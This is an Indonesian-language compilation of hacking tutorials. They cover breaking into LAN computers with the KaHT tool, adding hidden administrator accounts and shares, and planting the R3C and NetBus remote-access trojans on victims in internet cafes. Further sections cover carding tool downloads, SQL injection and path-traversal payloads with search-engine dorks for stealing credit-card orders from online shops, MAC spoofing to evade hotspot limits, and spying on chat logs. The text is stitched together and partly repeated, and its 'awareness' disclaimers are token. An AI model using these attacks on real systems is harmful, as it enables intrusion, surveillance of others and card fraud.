    Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

    Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaHT) maka ketikkan “CD\KaHT” dan seterusnya.

    Jika sudah, ini saatnya…

    Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
    kalau bingung bisa begini : "KaHT Ip1 ip2"
    ip1 : ip awal yang discan
    ip2 : ip terahkir yang discan

    Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe

    Nah kalo udah begini kita bisa berkreasi :

    Pingin biaya warnet kita lebih murah ?
    gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

    Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.

    Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe.

    Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas

    Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

    Penulis :
    Jogjahacking

    Referensi :
    1. Yogya Family Code
    2 .Jasakom.com

    *Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
    *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

    Membuat akses administrator Windows untuk kita lewat komputer lain

    Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.

    Melihat akses guest dan administrator di Windows
    Ketik : net user

    Melihat aktif tidaknya guest di Windows
    Ketik : net user guest

    Membuat akses guest menjadi Administrator dengan perintah :
    Ketik : net localgroup Administrators Guest /add

    Membuat akses adminstrator sendiri :
    1. Ketik : net user /add
    2. Ketik : net localgroup Administrators /add

    Menghapus akses administrator
    Ketik : net localgroup Users /delete

    Penulis :
    jogjahacking

    Referensi :
    1. y3dips dari situs Echo.or.id

    *Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
    *Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

    Cara melakukan share di komputer lain (2000/XP) secara bebas

    Pada tanggal 06 Januari 2005, penulis menemukan teknik baru cara melakukan share dikomputer sasaran secara bebas di Windows XP, yang dimana waktu itu penulis penasaran melihat isi share dengan perintah ///c$ (Default Share) yang sebelumnya lancar bisa masuk di drive C komputer sasaran, tiba-tiba setelah komputer sasaran diinstall ulang dan ditambah settingan, membuat penulis tidak dapat masuk lagi dengan perintah ///c$ dimana jika dijalankan perintah tersebut maka muncul sebuah form untuk memasukkan password.

    Dikomputer sasaran, penulis udah periksa ternyata akses password admin tidak dipassword juga tidak ada password di folder-folder lain yang share, tapi tetap saja di komputer sasaran meminta password, tapi dengan rasa pusing memikirkan ini ahkirnya penulis coba-coba masuk ke Help, disitu pada search penulis tulis c$, ahkirnya setelah ditunggu ahkirnya pada Search Results, di nomor 9 ada tulisan "Net Share" karena tulisan ini lebih sesuai topik maka penulispun masuk.kedalam ahkirnya di net share ini banyak membuka cakrawala pengetahuan penulis, dengan penemuan ini maka penulis jadi mempunyai ide cemerlang cara membuat share drive c, drive d atau folder-foldernya apa saja di komputer sasaran.

    Bagaimana caranya ?
    Siapkan program KaHT, kita terapkan lagi ilmu ini, lalu setelah kita masuk di komputer sasaran dengan KaHT maka kita ketikkan perintah : "Net Share =c:\" dengan perintah ini maka drive c akan dishare, jika anda takut ketahuan dengan user yang makek komputer itu, maka share saja foldernya, misalnya kita ingin menshare folder c:\windows caranya ketik "Net Share =c:\windows, oh iya bisa ditulis terserah anda dimana nantinya ini sebagai identitas nama untuk drive atau folder yang dishare.

    Ahkirnya dengan tutorial ini maka penulis mengakiri tanda tanya para pengguna KaHT yang ingin mengambil files dari komputer sasaran atau pengcopyan files ke komputer sasaran, dengan cara seperti ini maka kita bisa memanfaatkan komputer sasaran lebih jauh seperti memasang trojan, backup data ke komputer lain bahkan teknik cara mematai-mata teman chatting disatu warnet yang ditulis oleh penulis di Jasakom sebelumnya menjadi lebih mudah karena kita tinggal menshare folder mircnya saja dan kita mengubah file "mirc.ini" di notepad saja. :)

    Berkenalan dengan Trojan R3C

    Sebelum bicara lebih jauh tentang trojan R3C, penulis tidak bertanggung jawab atas penyalahgunaan artikel ini. artikel ini hanya untuk pembelajaran dan menambah wawasan saja.

    Untuk lebih lancarnya proses pembelajaran sebaiknya download dulu trojan yang kita sayangi ini.Anda dapat mendownloadnya di r3c download .setelah trojan berhasil di download, akan terlihat 2 buah file yaitu client.exe dan servavi.exe. File servavi merupakan program yang ada dalam komputer target sedangkan program client.exe merupakan sebagai program yang kita pegang sebagai remote. Sebenarnya permasalahan yang timbul adaalh bagaimana kita tahu bahwa suatu komputer telah tertanam trojan R3C ini.

    OK sekarang buka dulu program client.exe,untuk mengetahui komputer yang sudah tertanam trojan ini kita tinggal melakukan scan IPs. Klo hasil scan sudah didapat, tinggal kita masukkan no IP komputer target ke program clien kita, terus bagaimana klo hasil scan tidak menunjukkan hasil apa2.....? Gmn ya....? tenang saja banyak jalan menuju roma, kita pasang aja sendiri program servavi.exe itu. Cara masuk dan menaruh prog servavi.exe itu bisa dilakukan dengan beberapa program remote port scan antara lain legion, netcop, superscan dan lain lain (nanti cari di google sendiri ya....). Klo sudah bisa masuk ke komputer target tinggal klik 2 kali program servavi.exe itu, dan klo program itu sudah ada dikomputer target tinggal kita kerjain aja.(ups...becanda..ini Cuma pembelajaran) .

    Ok sekarang kita lihat dulu menu menu yang ada pada trojan ini...
    1. capture screen untuk melakukan capture, dengan ini kita dapat mengetahui apa yang sedang dikerjakan atau yang di buka oleh korban.
    2. message function berguna untuk menampilkan pesan kepada komputer korban.
    3. Policies berfungsi untuk melakukan perubahan pada registry dengan beberapa list yang sudah disediakan oleh trojan ini
    4. execute berguna untuk membuka program yang kita inginkan dengan mengetikkan contoh c:\windows\calc
    5. Open URL berguna untuk membuka alamat suatu website pada komputer korban
    6. Display BMP untuk menampilkan file gambar dengan format BMP
    7. Server info untuk menampilkan informasi komputer korban
    8. Redraw screen berguna untuk menghilangkan list hasil manipulasi yang telah dibuat.
    9. Don't Click!!! Berguna untuk menghilangkan server trojan ini.
    10. Pilihan shutdown untuk melakukan shutdown pada komputer korban.
    11. Pilihan restart untuk melakukan proses restart pada komputer target
    Sebenarnya masih banyak manipulasi atau hal2 yang kita inginkan (ato yang tidak diinginkan oleh korban he...he...), untuk lebih jelasnya lihat sendiri dan buktikan sendiri.

    Mungkin apabila anda belum punya target, bisa coba komputer sendiri dirumah tp ingat matikan dulu program anti virusnya krn trojan ini belum diimunisasi he...he...(becanda). Percobaan yang dilakukan penulis trojan ini hanya bekerja pada windows 9x untuk win XP belum bisa, mungkin suatu saat.

    Untuk temen2 yang melakukan percobaan dengan komputer sendiri saatnya untuk menghilangkan trojan itu. Biar nanti tidak dikatakan kurang bertanggung jawab.Caranya :
    1. Hapus file IPMON.EXE dan WINSOCK.EXE yang terdapat pada c:\windows\system
    2. Buka run, ketik msconfig, system configuration utility akan muncul dan klik tab startup, hilangkan centang pada ipmon.exe. Sekarang klik tab system.ini, pilih tanda + pada boot, akan muncul banyak pilihan tp yang kita lihat hanya pada shell=Explorer.exe winsock.exe, klik data tersebut lalu edit menjadi shell=Explorer.exe.

    Udah selesai, berarti penulis sudah tidak disalahkan lagi.

    Mengontrol komputer lain pada Windows XP dengan gabungan Remote & Trojan

    Penulis kali ini akan lebih menyempurnakan tutorial yang diterbitkan oleh banyak penulias sebelumnya yang beredar, yang berjudul "Berkenalan dengan Trojan R3C",dimana Trojan R3C ini dapat kita gabungkan dengan program kesayangan kita yaitu KaHT. Sebagai informasi saja bahwa sebelumnya program ini sudah diujicoba antar jaringan LAN di tempat penulis sendiri dengan hasil yang memuaskan.

    Perlu diketahui kedua program (KaHT dan R3C) ini memang terdetect oleh AntiVirus sebagai Trojan maka nonaktifkan dahulu AntiVirusnya. :)

    Baik kita mulai saja mempraktekkan gabungan KaHT dengan R3C yang bisa dikatakan cukup serasi, pertama kita jalankan program KaHT seperti biasa, setelah kita berada di komputer sasaran, kita lihat apakah komputer sasaran di share komputernya ? biasanya diwarnet-warnet Yogya di share di drive Dnya :P, walaupun tidak disharepun bisa juga melakukan share sendiri dengan cara dapat melihat tulisan saya dengan judul "Melakukan share dikomputer lain secara secara bebas pada Windows XP".

    Setelah itu kita copykan file servapi.exe ke komputer sasaran lewat sharing, jika sudah dicopy dikomputer sasaran, kita kembali ke KaHT tadi, misalkan saja tadi program servapi.exe ada di drive D, cukup kita panggil saja program client.exe, menurut pengalaman saya, kita panggil beberapa kali file ini, karena pernah satu kali saja tapi ternyata trojannya belum mau jalan. :P

    Setelah kita menjalankan program client.exe di komputer sasaran, sekarang tinggal kita jalankan program client.exe di komputer kita untuk mengontrol komputer sasaran.

    Sekarang kita pilih Scan IPs..., lalu akan muncul tampilan sebagai berikut

    Kita isi Get IP by Hostname dengan nama computer sasaran lalu klik arah panan kekanan dan hasilnya muncul ip addreas computer sasaran lalu kita klik arah panah keatas, kalo udah kita klik Start, setelah selesai prosesnya kita klik Exit lalu kita kita isi pada IP/name dengan ip addreas atau nama computer kita lalu kita klik Connect! dan muncul tampilan seperti dibawah ini :

    Kalau udah begini kita bisa ngapain aja pada komputer sasaran, dari ngambil gambar apa yang sedang dilakukan user di komputer (capture screen), ngirim pesan ke user komputer sasaran (message function), merubah registry windows komputer sasaran, menjalankan program apa saja yang kita inginkan dikomputer sasaran, memaksa komputer sasaran membuka alamat situs tertentu, melakukan shutdown pada komputer sasaran, melakukan restart dan masih banyak lagi.

    Tulisan ini sekaligus menutup jika ada anggapan bahwa Trojan R3C hanya berjalan di Windows 98, asal yang download R3C for Windows XP (bukan yang untuk Windows 98) dan yang paling penting saya tidak bertanggung apapun atas kesalahan dan kerusakan pada komputer manapun yang diakibatkan oleh tulisan saya, pergunakan ilmu ini untuk menjaga diri bukan untuk merusak, hidup dunia komunitas hacker Under

    netbus

    rumah grup ciputra cuma 61 jt
    Ads ppcindo

    24Share

    NetBus merupakan backdoor yang berjalan di sistem operasi Windows 9x dan NT. Dengan Netbus tersebut banyak hal menyenangkan yang bisa Anda lakukan, diantaranya adalah:

    * Membuka dan menutup CD-ROM Drive.
    * Melakukan shut down, log off, reboot dan power off.
    * Mengontrol gerakan mouse dan keyboard.
    * Menutup program.
    * Mengirimkan pesan atau text.
    * Memata-matai komputer “korban”.
    * Mengarahkan komputer “korban” sehingga membuka URL tertentu.

    Untuk menjalankan NetBus dibutuhkan 2 buah file, yaitu NetBus.exe dan Patch.exe (tapi nama file tersebut bisa saja diganti dengan nama yang lain). NetBus.exe merupakan file yang diletakkan di komputer kita, sedangkan Patch.exe diletakkan di komputer “korban”.

    Ada beberapa cara untuk “menanam” file Patch.exe di komputer “korban”. Misalnya dengan mengirimkan sebagai attachment saat Anda mengirim email. Jika penerima email tersebut mengeksekusi file Patch.exe maka file tersebut akan ter-copy ke directory Windows ( pada komputer “korban”). Cara lain adalah (ini yang lebih asyik) letakkan file tersebut di semua komputer pada suatu warnet.

    Jika berhasil Anda tinggal jalankan file NetBus.exe. Pada kolom Host name/IP Address isi dengan host name/ip address pada komputer si “korban”. Kalau Anda bingung, gunakan fasilitas Scan yang akan memeriksa komputer mana saja yang telah terdapat file Patch.exe. Selesai mengisi ip address klik tombol Connect. Tunggu beberapa saat. Jika koneksi berhasil tombol Connect akan berganti menjadi tombol Cancel dan setelah itu Anda bisa melakukan apa yang Anda sukai, termasuk menyadap password email orang lain.

    Untuk mendapatkan NetBus Anda bisa mendownloadnya dari HackersClub.

    carding


    The Carding
    Posted on 09.11 by CS-31
    1. cradit card checker
    2. cradit card number validator
    3. cradit card verifier
    4. cradit card generator with cvv2 Id cv2 generator
    5. cradit card validasi
    6. cradit card generator
    7. cradit card generator versi2
    8. Ip tools "hide Ip"

    download

    Cradit Card an Ip Tools
    Pass : www.bandit-medan.tk


    Exploid by Injection

    1. contoh bugs pada bentuk toko sistem shopadmin :
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    Ketik google.com :--> allinurl:/shopadmin.asp
    Contoh target : www.xxxxxx.com/shopadmin.asp
    Kelemahan sistem ini bila penjahat memasukan kode injection seperti :

    user : 'or'1
    pass : 'or'1

    atau

    user : admin
    pass : 'or'1


    2. contoh bugs pada bentuk toko sistem : Index CGI
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google.com : Ketik --> allinurl:/store/index.cgi/page=
    Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
    Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
    Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
    order.log

    3. contoh bugs pada bentuk toko sistem : metacart
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google.com allinurl:/metacart/
    Contoh target : www.xxxxxx.com/metacart/about.asp
    Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
    Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

    4. contoh bugs pada bentuk toko sistem :DCShop
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google.com : Ketik --> allinurl:/DCShop/
    Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
    Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt
    atau /DCShop/Orders/orders.txt
    Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

    5. contoh bugs pada bentuk toko sistem : PDshopro
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google.com : Ketik --> allinurl:/shop/category.asp/catid=
    Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
    Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/
    dbsetup.asp
    Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
    Dari keterangan diatas , kita dapati file databasenya dgn nama
    sdatapdshoppro.mdb
    Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
    www.xxxxxx.com/data/pdshoppro.mdb
    Buka file tsb pakai Microsoft Acces (karena untuk membaca database
    access.mdb sebaiknya pake ms access aja)

    6. contoh bugs pada bentuk toko sistem : commerceSQL
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google : Ketik --> allinurl:/commercesql/
    Contoh : www.xxxxx.com/commercesql/xxxxx
    Hapus commercesql/xxxxx dan ganti dengan -->
    cgi-bin/commercesql/index.cgi?page=
    Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
    Untuk melihat admin config -->
    www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
    Untuk melihat admin manager -->
    www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
    Untuk melihat file log/CCnya -->
    www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...

    7. contoh bugs pada bentuk toko sistem : EShop
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google: Ketik --> allinurl:/eshop/
    Contoh : www.xxxxx.com/xxxxx/eshop
    Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
    Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
    Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
    (karena untuk membaca database access.mdb sebaiknya pake ms access
    aja)

    8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google.com: Ketik --> allinurl:/cart32.exe/
    Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
    Ganti NoItemFound dengan --> error
    Bila kita mendapati page error dg keterangan instalasi dibawahnya,
    berarti kita sukses!
    Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
    kebawah, dan cari bagian Page Setup and Directory
    Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
    berarti di site tsb. terdapat file berisi data cc
    Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
    text editor lainnya.
    Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
    Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
    dimodifikasi tadi, dengan format
    http://www.xxxxx.com/cart32/
    Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

    9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
    teknik/jalan ke dua
    google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
    Buka url target dan tambahkan string berikut di akhir bagian
    shopdisplayproducts.asp
    Contoh :
    http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%...,
    fldpassword%20from%20tbluser%20where%20fldusername=
    'admin'%20and%20fldpassword%20like%20'a%25'--
    Gantilah nilai dari string url terakhir dg:
    %20'a%25'--
    %20'b%25'--
    %20'c%25'--
    Kalau berhasil, kita akan mendapatkan informasi username dan password
    admin
    Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
    silahkan Cari sendiri data CCnya

    10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

    Buka url target dan utk membuat admin baru, postingkan data berikut
    satu per satu pada bagian search engine :
    Keyword=&category=5); insert into tbluser (fldusername) values
    ('')--&SubCategory=&hide=&action.x=46&action.y=6
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Keyword=&category=3); update tbluser set fldaccess='1' where
    fldusername=''--&SubCategory=All&action.x=33&action.y=6
    Jangan lupa untuk mengganti dan nya terserah kamu.
    Untuk mengganti password admin, masukkan keyword berikut :
    Keyword=&category=5); update tbluser set fldpassword='' where
    fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

    Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

    11. contoh bugs pada bentuk toko sistem : Lobby.asp
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google.com Ketik --> allinurl: Lobby.asp
    Contoh : www.xxxxx.com/mall/lobby.asp
    Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
    Hasilnya : www.xxxxx.com/fpdb/shop.mdb

    12. contoh bugs pada bentuk toko sistem : Shopper.cgi
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google : Ketik --> allinurl: /cgi-local/shopper.cgi
    Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
    Tambah dengan --> ...&template=order.log
    Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template...

    13. contoh bugs pada bentuk toko sistem :Proddetail.asp
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    Ketik --> allinurl:proddetail.asp?prod=
    Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
    Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/
    vsproducts.mdb
    Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

    14. contoh bugs pada bentuk toko sistem :Digishop
    contoh toko akan muncul di search engine bila mengetikan beberapa
    keyword, seperti :
    google Ketik --> inurl:"/cart.php?m="
    Contoh : http://xxxxxxx.com/store/cart.php?m=view.
    Hapus tulisan cart.php?m=view dan ganti dengan -->admin
    Hasilnya http://xxxxxx.com/store/admin
    Trus masukin username sama pass nya pake statment SQL injection

    Usename : 'or"="
    Password : 'or"="

    sumber http://bandit-medan.tk

    jebol hotspot


    d HotSpot
    Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut.

    Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis, sangatlah terbatas.
    Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.



    Apa itu MAC Adress ?
    In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).


    Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita.

    Bagaimana menjebol Proteksi dengan MAC Address ?
    Ada sebuah tools yang sangat bermanfaat untuk anda.Tools itu bernama K-MAC.Anda dapat mendownloadnya disini : http://indoupload.net/files/8318/k-mac.zip


    Dengan tools ini anda akan dapat mengubah MAC-Address anda secara instant dan apa artinya ? Anda dapat menjebol Proteksi MAC Address ! Setiap jatah akses internet anda habis dalam waktu 3 jam, yang anda perlu lakukan hanyalah mengubah MAC Address anda, dan lakukan koneksi kemba

    cara remot komputer org lain



    Cara meremote komputer orang lain

    Kamu Ingin Belajar Hacking ? Apakah kamu bisa memasuki computer orang (membajak ) dari komputermu sehingga kamu bisa mengambil data, menyadap password, bahkan merusak system computer? Apakah kamu bisa mengendalikan computer orang lewat komputermu, sampai pemilik computer mengira komputernya kesurupan jin ketika program-program komputernya aktif sendiri, CD room keluar-masuk dll ? Hehe (panggilan darijawabannya bisa coy….! Ini sangat cocok untuk kalangan NewBie gerombolan hacker untuk orang yang baru mengenal Computer Network). Oke coy…! Kalau kamu ingin memasuki computer orang, kamu bisa menggunakan 3D Traceroute dengan menscan port untuk masuk kepada computer Korban. Atau pada computer yang menggunakan LAN kamu bisa pakai program Internet Maniac v1.0. Oke supaya kamu ga kebingungan….santai…dan baca di bawah ini : Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Kamu ingin masuk dikomputer teman kamu dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa aja ? itu mudah, semua caranya ada disini. Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) ... Downloadlah program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali kamu periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe…. Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali kamu periksa dahulu jaringan kamu dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini). Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja). Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja jalankan program Internet Maniac. Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, Tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:KaH) maka ketikkan "CDKaHT" dan seterusnya. Jika sudah, ini saatnya? Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : "KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan. Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:windowssystem" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Kamu bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe. Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan sama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:Program FilesMiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat "/logs" maksudnya kalau tadi di C:program FilesMiRC program MiRCnya maka cukup masuk aja di C:Program FilesMiRCLogs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan ? Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. Membuat Akses Administrator Windows Untuk Kita Lewat Komputer Lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri : 1. Ketik : net user /add 2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete Mengendalikan Computer Orang Lewat Computer Kamu Untuk ini kamu memerlukan program yang namanya lumayan serem "NetBus". Kamu bisa pakai NetBus versi 1.6 atau 1.70 dengan port 12345. Atau NetBus 2.0 Pro dengan port 20024 atau 20043. Bagaiman caranya ? Kamu tidak akan bisa sebelum mengirimkan Patch.exe ke computer korban. Kalau lewan Chat mIRC kamu bisa mengirimkan alamat Patch.exe ke partner chat kamu yang memungkinkan dia mengklik patch.exe tersebut. Atau yang lebih mudah untuk uji coba, kamu bisa memasangkan Patch.exe itu langsung, misal di warnet. Kamu copy patch.exe itu yang sudah kamu simpan di flashdisk, misak di C: , terus kamu klik patch.exe itu (install / usahakan kamu sembunyikan letak patch.exe itu agar sulit di temukan). Nah sekarang kamu catat IP Address / Hostname computer yang sudah dikasih patch.exe itu, terus kamu pulang ke kamarmu, lalu nyalakan komputermu dan aktifkan netbus. Kamu isi tu IP computer korban di netbus dan pilih tombol connect. Maka NetBus akan tersambung dengan computer korban secara otomatis. Wah… disini kamu akan melihat betapa jahatnya NetBus, kamu bisa mengeluarkan/memasukkan CD Room computer korban, kamu bisa mengendalikan keyboard, mouse, dan program-program yang ada di computer korban, kamu pun bisa mematikan / merestart computer korban. Yang paling oke kamu juga bisa menyadap password, mengambil data, atau memantau orang-orang yang menggunakan computer tersebut. Hehe…semua yang menggunakan computer itu pasti Catatan: *Segala kesalahan error /mengira komputernya kesurup

